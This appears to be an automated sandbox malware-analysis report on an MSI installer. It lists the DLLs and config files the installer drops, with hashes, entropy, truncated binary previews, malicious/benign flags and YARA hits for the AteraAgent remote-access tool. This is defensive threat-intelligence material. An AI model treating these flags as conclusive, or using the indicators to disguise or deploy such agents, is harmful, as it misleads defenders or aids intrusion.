                                                                                                                                                                                                                                                                                              SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                              SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI2D79.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):711952
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                              MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                              SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                              SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                              SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI2D79.tmp-\System.Management.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):61448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                              MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                              SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                              SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                              SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI2FBD.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):521954
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                              MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                              SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                              SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                              SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI2FBD.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25600
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                              MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                              SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                              SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                              SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI2FBD.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI2FBD.tmp-\CustomAction.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1538
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                              MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                              SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                              SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                              SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI2FBD.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):184240
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                              MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                              SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                              SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                              SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI2FBD.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):711952
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                              MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                              SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                              SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                              SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI2FBD.tmp-\System.Management.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):61448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                              MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                              SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                              SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                              SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI3FBB.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):521954
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                              MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                              SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                              SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                              SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI3FBB.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25600
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                              MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                              SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                              SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                              SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI3FBB.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI3FBB.tmp-\CustomAction.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1538
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                              MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                              SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                              SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                              SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI3FBB.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):184240
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                              MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                              SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                              SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                              SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI3FBB.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):711952
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                              MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                              SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                              SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                              SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI3FBB.tmp-\System.Management.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):61448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                              MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                              SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                              SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                              SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI41D0.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):437346
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.648237321448186
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:Bt3jOZy2KsGU6a4Ksht3jOZy2KsGU6a4KsW:fzOE2Z34KGzOE2Z34K7
                                                                                                                                                                                                                                                                                              MD5:B5869E085F47D2F8DEEEA7D5F784D257
                                                                                                                                                                                                                                                                                              SHA1:422D3D23870197172E74881CFE070B59CBB5A812
